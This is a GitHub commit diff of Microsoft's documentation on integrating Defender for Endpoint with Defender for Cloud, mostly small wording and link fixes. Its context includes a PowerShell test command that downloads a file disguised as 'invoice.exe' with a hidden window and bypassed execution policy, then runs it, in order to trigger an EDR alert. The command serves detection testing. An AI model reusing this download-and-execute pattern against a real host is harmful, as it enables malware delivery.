Skip to content

Commit 3cb01bd

Browse files
Merge pull request #239516 from dcurwin/mde-mdc-may28-2023
Fix offboarding section
2 parents 695b6ff + 8e33c25 commit 3cb01bd

File tree

1 file changed

+7
-8
lines changed

1 file changed

+7
-8
lines changed

articles/defender-for-cloud/integration-defender-for-endpoint.md

Lines changed: 7 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -48,7 +48,7 @@ The protections include:
4848

4949
- **Threat intelligence**. Defender for Endpoint generates alerts when it identifies attacker tools, techniques, and procedures. It uses data generated by Microsoft threat hunters and security teams, augmented by intelligence provided by partners.
5050

51-
When you integrate Defender for Endpoint with Defender for Cloud, you'll gain access to the benefits from the following extra capabilities:
51+
When you integrate Defender for Endpoint with Defender for Cloud, you gain access to the benefits from the following extra capabilities:
5252

5353
- **Automated onboarding**. Defender for Cloud automatically enables the Defender for Endpoint sensor on all supported machines connected to Defender for Cloud.
5454

@@ -72,9 +72,9 @@ Before you can enable the Microsoft Defender for Endpoint integration with Defen
7272

7373
- Ensure the machine is connected to Azure and the internet as required:
7474

75-
- **Azure virtual machines (Windows or Linux)** - Configure the network settings described in configure device proxy and internet connectivity settings: [Windows](/microsoft-365/security/defender-endpoint/configure-proxy-internet) or [Linux](/microsoft-365/security/defender-endpoint/linux-static-proxy-configuration).
75+
- **Azure virtual machines (Windows or Linux)** - Configure the network settings described in configure device proxy and internet connectivity settings: [Windows](/microsoft-365/security/defender-endpoint/configure-proxy-internet) or [Linux](/microsoft-365/security/defender-endpoint/linux-static-proxy-configuration).
7676

77-
- **On-premises machines** - Connect your target machines to Azure Arc as explained in [Connect hybrid machines with Azure Arc-enabled servers](../azure-arc/servers/learn/quick-enable-hybrid-vm.md).
77+
- **On-premises machines** - Connect your target machines to Azure Arc as explained in [Connect hybrid machines with Azure Arc-enabled servers](../azure-arc/servers/learn/quick-enable-hybrid-vm.md).
7878

7979
- Enable **Microsoft Defender for Servers**. See [Quickstart: Enable Defender for Cloud's enhanced security features](enable-enhanced-security.md).
8080

@@ -106,7 +106,7 @@ You'll deploy Defender for Endpoint to your Windows machines in one of two ways
106106

107107
If you've already enabled the integration with **Defender for Endpoint**, you have complete control over when and whether to deploy the MDE unified solution to your **Windows** machines.
108108

109-
To deploy the MDE unified solution, you'll need to use the [REST API call](#enable-the-mde-unified-solution-at-scale) or the Azure portal:
109+
To deploy the MDE unified solution, you need to use the [REST API call](#enable-the-mde-unified-solution-at-scale) or the Azure portal:
110110

111111
1. From Defender for Cloud's menu, select **Environment settings** and select the subscription with the Windows machines that you want to receive Defender for Endpoint.
112112

@@ -119,7 +119,6 @@ To deploy the MDE unified solution, you'll need to use the [REST API call](#enab
119119
120120
1. Select **Fix** to see the components that aren't enabled.
121121

122-
123122
:::image type="content" source="./media/integration-defender-for-endpoint/fix-defender-for-endpoint.png" alt-text="Screenshot of Fix button that enables Microsoft Defender for Endpoint support.":::
124123

125124
1. To enable the Unified solution for Windows Server 2012 R2 and 2016 machines, select **Enable**.
@@ -181,7 +180,6 @@ If you've already enabled the integration with **Defender for Endpoint for Windo
181180
182181
1. Select **Fix** to see the components that aren't enabled.
183182

184-
185183
:::image type="content" source="./media/integration-defender-for-endpoint/fix-defender-for-endpoint.png" alt-text="Screenshot of Fix button that enables Microsoft Defender for Endpoint support.":::
186184

187185
1. To enable deployment to Linux machines, select **Enable**.
@@ -200,7 +198,6 @@ If you've already enabled the integration with **Defender for Endpoint for Windo
200198
> [!NOTE]
201199
> The next time you return to this page of the Azure portal, the **Enable for Linux machines** button won't be shown. To disable the integration for Linux, you'll need to disable it for Windows too by clearing the checkbox for **Allow Microsoft Defender for Endpoint to access my data**, and selecting **Save**.
202200
203-
204201
1. To verify installation of Defender for Endpoint on a Linux machine, run the following shell command on your machines:
205202

206203
`mdatp health`
@@ -312,6 +309,7 @@ For endpoints running Windows:
312309
```powershell
313310
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe'); Start-Process 'C:\\test-MDATP-test\\invoice.exe'
314311
```
312+
315313
:::image type="content" source="./media/integration-defender-for-endpoint/generate-edr-alert.png" alt-text="A command prompt window with the command to generate a test alert.":::
316314
317315
If the command is successful, you'll see a new alert on the workload protection dashboard and the Microsoft Defender for Endpoint portal. This alert might take a few minutes to appear.
@@ -373,7 +371,7 @@ Defender for Cloud automatically deploys the extension to machines running:
373371
- Linux.
374372
375373
> [!IMPORTANT]
376-
> If you delete the MDE.Windows/MDE.Linux extension, it will not remove Microsoft Defender for Endpoint. to 'offboard', see [Offboard Windows servers.](/microsoft-365/security/defender-endpoint/configure-server-endpoints).
374+
> If you delete the MDE.Windows/MDE.Linux extension, it will not remove Microsoft Defender for Endpoint. To offboard the machine, see [Offboard Windows servers.](/microsoft-365/security/defender-endpoint/configure-server-endpoints#offboard-windows-servers).
377375
378376
### I enabled the solution but the `MDE.Windows`/`MDE.Linux` extension isn't showing on my machine
379377
@@ -391,6 +389,7 @@ Licenses for Defender for Endpoint for servers are included with **Microsoft Def
391389
### Do I need to buy a separate anti-malware solution to protect my machines?
392390
393391
No. With MDE integration in Defender for Servers, you'll also get malware protection on your machines.
392+
394393
- On Windows Server 2012 R2 with MDE unified solution integration enabled, Defender for Servers will deploy [Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-windows) in *active mode*.
395394
- On newer Windows Server operating systems, Microsoft Defender Antivirus is part of the operating system and will be enabled in *active mode*.
396395
- On Linux, Defender for Servers will deploy MDE including the anti-malware component, and set the component in *passive mode*.

0 commit comments

Comments
 (0)